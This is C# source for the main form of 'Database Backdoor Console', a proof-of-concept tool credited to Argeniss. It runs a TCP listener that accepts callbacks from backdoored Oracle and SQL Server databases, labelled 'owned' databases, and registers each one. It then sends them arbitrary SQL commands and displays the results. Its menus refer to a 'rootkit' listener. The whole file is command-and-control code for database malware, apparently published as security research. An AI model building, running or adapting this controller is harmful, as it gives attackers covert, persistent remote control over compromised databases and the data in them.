﻿// Argeniss - Information Security
//  www.argeniss.com
//
// Database Backdoor Console (Proof-of-concept Beta Version)
// 
// Author: Esteban Martinez Fayo (esteban>.at.<argeniss>.dot.<com)

using System;
using System.Collections.Generic;
using System.ComponentModel;
using System.Data;
using System.Drawing;
using System.Text;
using System.Windows.Forms;

namespace DBBackdoorConsole
{
    public partial class FrmMain : Form
    {
        private delegate void AddOwnedDatabaseItem(String sStr);
        private AddOwnedDatabaseItem delegateAddOwnedDatabaseItem;

        private void AddOwnedDatabaseItemMethod(String sStr)
        {
            treeView1.Nodes.Add(sStr);
        }

        private delegate void DelegateUpdateBackdoorConnStatus();
        private DelegateUpdateBackdoorConnStatus delegateUpdateBackdoorConnStatus;

        private System.Net.Sockets.TcpListener m_ServerListener = null;

        public Int32 ListenerPort
        {
            get
            {
                int i = 0;
                try
                {
                    int.TryParse(toolStripTxtBackdoorPort.Text, out i);
                }
                catch
                {
                    toolStripTxtBackdoorPort.Text = "0";
                }

                return i;
            }
        }

        /// <summary>
        /// The Database type that is selected, can be "Oracle" or "SQL Server"
        /// </summary>
        private int m_CurrentOwnedDBIndex = 0;

        private string m_CurrentDBType;

        private List<BackdoorCommand> commandsForOracle = new List<BackdoorCommand>();

        private List<BackdoorCommand> commandsForSQLServer = new List<BackdoorCommand>();

        private List<OwnedDatabase> ownedDBs = new List<OwnedDatabase>();

        private System.Threading.ManualResetEvent SQLServerResponseEvent = new System.Threading.ManualResetEvent(true);

        private string m_SQLServerResponse;


        public FrmMain()
        {
            InitializeComponent();
            delegateAddOwnedDatabaseItem = new AddOwnedDatabaseItem(AddOwnedDatabaseItemMethod);
            delegateUpdateBackdoorConnStatus = new DelegateUpdateBackdoorConnStatus(UpdateBackdoorConnStatus);
            ReadData();
            StartListener();
            if (m_ServerListener != null)
                listenerWorker.RunWorkerAsync();
        }


        private void ReadData()
        {
            System.Data.DataSet ds = new DataSet();
            ds.ReadXml("DBBackdoorConsoleData.xml", XmlReadMode.Auto);

            foreach (DataRow r in ds.Tables["Command"].Rows)
            {
                switch (r.ItemArray[1].ToString())
                {
                    case "Oracle":
                        commandsForOracle.Add(new BackdoorCommand(r.ItemArray[0].ToString(), r.ItemArray[1].ToString(), r.ItemArray[2].ToString(), txtSQLText));
                        break;
                    case "SQL Server":
                        commandsForSQLServer.Add(new BackdoorCommand(r.ItemArray[0].ToString(), r.ItemArray[1].ToString(), r.ItemArray[2].ToString(), txtSQLText));
                        break;
                }
            }
        }


        private void StartListener()
        {
            m_ServerListener = new System.Net.Sockets.TcpListener(ListenerPort);
            try
            {
                m_ServerListener.Start();
            }
            catch (System.Net.Sockets.SocketException ex)
            {
                MessageBox.Show(this, "Exception while trying to start the listener on port " + ListenerPort.ToString() + "\r\n\r\n" + ex.Message, Application.ProductName, MessageBoxButtons.OK, MessageBoxIcon.Exclamation);
                m_ServerListener = null;
            }
        }


        private void ConnectionLoop()
        {
            System.Net.Sockets.Socket so;
            byte[] recBytes = new byte[1024];
            string str;

            while (true)
            {
                try
                {
                    so = m_ServerListener.AcceptSocket();
                }
                catch (System.Net.Sockets.SocketException soe)
                {
                    if (soe.SocketErrorCode == System.Net.Sockets.SocketError.Interrupted)
                        break;
                    else
                        throw;
                }
                int NrReceivedBytes = so.Receive(recBytes);
                str = Encoding.UTF8.GetString(recBytes, 0, NrReceivedBytes);
                str = str.Trim('\0');   // Remove null bytes

                string sDBType;
                string ServerVersion;
                string sDBName;
                string sDBID;

                if (str.StartsWith("HEAD "))
                {
                    if (str.IndexOf("\r\nContent-Length: 4\r\n") > 0)
                    {
                        sDBType = "SQL Server";
                        ServerVersion = "Microsoft SQL Server";
                        sDBName = "";
                        sDBID = "";
                    }
                    else
                    {
                        int Pos = str.IndexOf("\r\n\r\n");
                        while (so.Available > 0)
                        {
                            NrReceivedBytes = so.Receive(recBytes);
                            str += Encoding.UTF8.GetString(recBytes, 0, NrReceivedBytes);
                            str = str.Trim('\0');   // Remove null bytes
                        };
                        m_SQLServerResponse = str.Substring(Pos + 4);
                        ownedDBs[m_CurrentOwnedDBIndex].SetConnection(so);
                        SQLServerResponseEvent.Set();
                        continue;
                    }
                }
                else
                {
                    try
                    {
                        System.Xml.XmlDocument xDoc = new System.Xml.XmlDocument();
                        xDoc.Schemas.Add("http://tempuri.org/IncomingBackdoorConn.xsd", "IncomingBackdoorConn.xsd");
                        xDoc.LoadXml(str);

                        try
                        {
                            sDBType = xDoc.DocumentElement.Attributes.GetNamedItem("DBType").Value;
                            ServerVersion = xDoc.DocumentElement.Attributes.GetNamedItem("ServerVersion").Value;
                            sDBName = xDoc.DocumentElement.Attributes.GetNamedItem("DBName").Value;
                            sDBID = xDoc.DocumentElement.Attributes.GetNamedItem("DBID").Value;
                        }
                        catch (System.NullReferenceException)
                        {
                            MessageBox.Show(this, "The received XML document doesn't have the expected required elements and attributes.", Application.ProductName, MessageBoxButtons.OK, MessageBoxIcon.Exclamation);
                            so.Close();
                            continue;
                        }
                    }
                    catch (System.Xml.XmlException xmlEx)
                    {
                        MessageBox.Show(null, "Exception while trying to analyze the received data as an XML document." + "\r\n\r\n" + xmlEx.Message, Application.ProductName, MessageBoxButtons.OK, MessageBoxIcon.Exclamation);
                        so.Close();
                        continue;
                    }
                }
                bool dbIsAlreadyRegistered = false;

                foreach (OwnedDatabase ownedDB in ownedDBs)
                {
                    if (ownedDB.DBID == sDBID && ownedDB.DBName == sDBName && ownedDB.DBType == sDBType)
                    {
                        dbIsAlreadyRegistered = true;
                        if (ownedDB.Connected)
                        {
                            so.Close();
                        }
                        else
                        {
                            ownedDB.SetConnection(so);
                            Invoke(delegateUpdateBackdoorConnStatus);
                        }
                        break;
                    }
                }

                if (!dbIsAlreadyRegistered)
                {
                    OwnedDatabase newOwnedDB = new OwnedDatabase(
                        sDBType,
                        ServerVersion,
                        sDBName,
                        sDBID,
                        so);
                    ownedDBs.Add(newOwnedDB);
                    Invoke(delegateAddOwnedDatabaseItem, new Object[] { ((System.Net.IPEndPoint)(so.RemoteEndPoint)).Address.ToString() + ":" + sDBName });
                }
            }
        }


        private void UpdateBackdoorConnStatus()
        {
            if (treeView1.SelectedNode != null)
            {
                int i = treeView1.SelectedNode.Index;
                cmdSendCommand.Enabled = ownedDBs[i].Connected;
                cmdDisconnect.Enabled = cmdSendCommand.Enabled;
            }
        }

        private void listenerWorker_DoWork(object sender, DoWorkEventArgs e)
        {
            ConnectionLoop();
        }


        #region "UI Events"
        
        private void aboutToolStripMenuItem_Click(object sender, EventArgs e)
        {
            AboutBox1 frm = new AboutBox1();
            frm.ShowDialog();
        }


        private void exitToolStripMenuItem_Click(object sender, EventArgs e)
        {
            this.Close();
        }


        private void listView1_SelectedIndexChanged(object sender, EventArgs e)
        {
            if (listView1.SelectedIndices.Count > 0)
            {
                int i = listView1.SelectedIndices[0];

                switch (m_CurrentDBType)
                {
                    case "Oracle":
                        commandsForOracle[i].FillParameterControls(flowParameters);
                        break;
                    case "SQL Server":
                        commandsForSQLServer[i].FillParameterControls(flowParameters);
                        break;
                }
            }
            UpdateBackdoorConnStatus();
        }


        private void listView1_DoubleClick(object sender, EventArgs e)
        {
            if (listView1.FocusedItem != null)
            {
                int i = listView1.FocusedItem.Index;
                switch (m_CurrentDBType)
                {
                    case "Oracle":
                        txtSQLText.Text = commandsForOracle[i].GetSQLTextToExec(flowParameters);
                        break;
                    case "SQL Server":
                        txtSQLText.Text = commandsForSQLServer[i].GetSQLTextToExec(flowParameters);
                        break;
                }
            }
        }

        
        private void treeView1_AfterSelect(object sender, TreeViewEventArgs e)
        {
            listView1.Items.Clear();
            txtResults.Text = "";
            dgResults.Columns.Clear();
            dgResults.Rows.Clear();

            if (treeView1.SelectedNode != null)
            {
                int i = treeView1.SelectedNode.Index;
                m_CurrentOwnedDBIndex = i;
                m_CurrentDBType = ownedDBs[i].DBType;
                UpdateBackdoorConnStatus();
                txtDBName.Text = ownedDBs[i].DBName;
                txtDBID.Text = ownedDBs[i].DBID;
                txtServerVersion.Text = ownedDBs[i].ServerVersion;

                switch (m_CurrentDBType)
                {
                    case "Oracle":
                        foreach (BackdoorCommand cmd in commandsForOracle)
                            listView1.Items.Add(cmd.Name).SubItems.Add(cmd.Name);
                        break;
                    case "SQL Server":
                        foreach (BackdoorCommand cmd in commandsForSQLServer)
                            listView1.Items.Add(cmd.Name).SubItems.Add(cmd.Name);
                        break;
                }
            }
            else
            {
                m_CurrentDBType = "";
                UpdateBackdoorConnStatus();
                txtDBName.Text = "";
                txtDBID.Text = "";
                txtServerVersion.Text = "";
            }
        }


        private void cmdSendCommand_Click(object sender, EventArgs e)
        {
            Cursor.Current = Cursors.WaitCursor;
            try
            {
                if (treeView1.SelectedNode != null)
                {
                    int i = treeView1.SelectedNode.Index;
                    dgResults.Rows.Clear();
                    dgResults.Columns.Clear();
                    txtResults.Text = "";

                    if (ownedDBs[i].DBType == "SQL Server")
                    {
                        m_SQLServerResponse = "";
                        SQLServerResponseEvent.Reset();
                    }
                    string sResult = ownedDBs[i].SendSQLCommand(txtSQLText.Text);
                    if (sResult == "" && ownedDBs[i].DBType == "SQL Server")
                    {
                        SQLServerResponseEvent.WaitOne();
                        sResult = m_SQLServerResponse;
                        m_SQLServerResponse = "";
                    }
                    if (txtSQLText.Text.TrimStart().StartsWith("SELECT ", StringComparison.CurrentCultureIgnoreCase))
                    {
                        string[] saRecords;
                        string[] sa;

                        txtResults.Visible = false;
                        dgResults.Visible = true;

                        if (ownedDBs[i].DBType == "SQL Server")
                        {
                            saRecords = sResult.Split(new string[] { "\r\n" }, StringSplitOptions.None);
                            if (saRecords.Length > 0)
                            {
                                sa = saRecords[0].Split(new string[] { "\t" }, StringSplitOptions.None);
                                foreach (string str in sa)
                                    dgResults.Columns.Add(str, str);

                                for (int k = 1; k < saRecords.Length; k++)
                                {
                                    sa = saRecords[k].Split(new string[] { "\t" }, StringSplitOptions.None);
                                    dgResults.Rows.Add(sa);
                                }
                            }
                        }
                        else
                        {

                            saRecords = sResult.Split(new string[] { "\r\n\r\n" }, StringSplitOptions.None);
                            if (saRecords.Length > 0)
                            {
                                sa = saRecords[0].Split(new string[] { "\r\n" }, StringSplitOptions.None);
                                foreach (string str in sa)
                                    dgResults.Columns.Add(str, str);

                                for (int k = 1; k < saRecords.Length; k++)
                                {
                                    sa = saRecords[k].Split(new string[] { "\r\n" }, StringSplitOptions.None);
                                    dgResults.Rows.Add(sa);
                                }
                            }
                        }
                    }
                    else
                    {
                        dgResults.Visible = false;
                        txtResults.Visible = true;
                        if (sResult.StartsWith("Operation is not allowed when the object is closed."))
                            txtResults.Text = "";
                        else
                            txtResults.Text = sResult;
                    }
                }
            }
            finally
            {
                Cursor.Current = Cursors.Default;
            }
        }


        private void cmdReplaceParams_Click(object sender, EventArgs e)
        {
            if (listView1.FocusedItem != null)
            {
                int iCommandIndex = listView1.FocusedItem.Index;

                if (m_CurrentDBType == "SQL Server")
                {
                    txtSQLText.Text = commandsForSQLServer[iCommandIndex].GetSQLTextToExec(flowParameters);
                }
                else
                {
                    txtSQLText.Text = commandsForOracle[iCommandIndex].GetSQLTextToExec(flowParameters);
                }
            }
        }


        private void rootkitToolStripMenuItem_Click(object sender, EventArgs e)
        {
            bool bListenerActive;
            if (m_ServerListener != null)
                bListenerActive = true;
            else
                bListenerActive = false;
            
            stopBackdoorListenerToolStripMenuItem.Enabled = bListenerActive;
            startBackdoorListenerToolStripMenuItem.Enabled = !bListenerActive;
        }


        private void startRootkitListenerToolStripMenuItem_Click(object sender, EventArgs e)
        {
            StartListener();
            if (m_ServerListener != null)
                listenerWorker.RunWorkerAsync();
        }


        private void stopRootkitListenerToolStripMenuItem_Click(object sender, EventArgs e)
        {
            if (m_ServerListener != null)
                m_ServerListener.Stop();
            m_ServerListener = null;
        }


        private void toolStripTxtRootkitPort_KeyPress(object sender, KeyPressEventArgs e)
        {
            if (!(e.KeyChar >= '0' && e.KeyChar <= '9') && e.KeyChar != '\b')
                e.KeyChar = '\0';
        }


        private void cmdDisconnect_Click(object sender, EventArgs e)
        {
            if (treeView1.SelectedNode != null)
            {
                int i = treeView1.SelectedNode.Index;
                ownedDBs[i].EndJob();
                ownedDBs[i].Disconnect();
                UpdateBackdoorConnStatus();
            }
        }


        private void FrmMain_Resize(object sender, EventArgs e)
        {
            panel2.Height = this.Height / 4;
        }

        #endregion // UI Events

    } // FrmMain

} // DBBackdoorConsole
